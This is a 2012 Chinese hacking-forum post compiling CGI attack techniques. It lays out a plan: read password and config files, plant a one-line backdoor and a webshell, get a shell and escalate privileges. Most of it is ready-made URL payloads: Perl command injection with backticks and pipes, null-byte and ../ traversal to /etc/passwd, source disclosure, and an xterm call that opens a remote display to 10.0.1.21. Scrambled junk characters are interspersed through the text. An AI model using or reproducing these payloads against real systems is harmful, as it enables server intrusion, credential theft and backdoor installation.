找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3079|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  
, m# U3 k/ p. M/ Icookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  9 O" ]" J8 C, `( K
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
* c! r9 p% L. Y2 D0 E注“  
, s! ~- r' n: Iperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  9 V- F% ?+ m$ V& \2 M# U. r
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  ) b9 C3 M, }/ e/ e

* a, D9 ?2 B7 r; q. y6 p- w& Chttp://target.com/cgi-bin/home/news/sub.pl?12 随意构造  4 Y9 U( |; P( J8 Z2 Q8 [
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  6 v3 o: l& m" z
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  
* ~* f/ g2 `- ^9 n* ^2 r7 rhttp://target.com/cgi-bin/home/news/sub.pl?`id`  
/ k: |6 v1 U- Q8 x- ?http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  
2 Y- m- u' ]1 K- khttp://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  
( e8 K/ `$ p% k5 V0 \. P* |6 D* a/ J) Y3 c# ?& _2 s+ V0 S: o; e
http://target.com/test.pl;ls|  7 v* ~1 _9 w. j
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
6 \7 K# l  R' }http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  " M/ q/ N+ l( _; K) A% J! |
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  
9 V$ X/ ?/ `1 e5 l8 }2 R比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  ; ~; Z) g; M; _. d
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  
( t. B$ P$ S: n' b) \' h4 r5 F
5 o9 {$ r7 l- g* M7 [! lhttp://target.com/test.pl?&........ /../../etc/passwd  9 o# t. {: c7 I
; K2 J1 v, f5 d
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  - @2 n" i) o8 H4 u! L7 F' s: R
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  ; j9 n$ J8 A0 @! _" N( Y
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  $ s" u7 @/ n8 m6 H- B

; s- V5 ]/ x& @0 ~/ ]http://www.target.org/show.php?f ... /include/config.php 查看php代码  
7 x& D2 n2 @8 Z, x9 `3 nhttp://www.target.org/show.php?f ... ng/admin/global.php  7 [/ Q4 z- U% e* n2 _! p: N8 j

6 V- B, \5 ~& h  Bemm和ps的一句话
! t: o# e' j/ ], k
: U9 w/ \# u4 ~; I. r2 s7 vhttp://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  1 ]% h5 w& Z: K, H- u3 [4 Y/ ]

& q2 f0 y! o6 E0 d  H) d3 ~$ M6 l  `>bbb%20|  
5 `* P6 A8 Y) x" s3 z) a  p1 R5 I8 u, i0 m
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  * ~0 ^. ^$ J) _; E$ b" X5 F6 c6 c
3 ]* X8 ], {, D8 G% Z2 s
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  ! g' }4 ~2 x" A- J: {4 V  Y3 m8 x1 S
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
9 q) [3 t" \# @- F0 }( [
2 _9 X8 D+ m  h3 m5 \7 E" U: p相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
* y; s3 I! ~4 V( e7 T2 T: ^http://target.com/index.html#cmd.exe  
" L7 ]1 Y. `! Y& T2 _8 thttp://target.com/index.html?dummyparam=xp_cmdshell  
: C7 m2 p3 b" i7 J8 J! {lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  * Z  A7 S  j$ A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表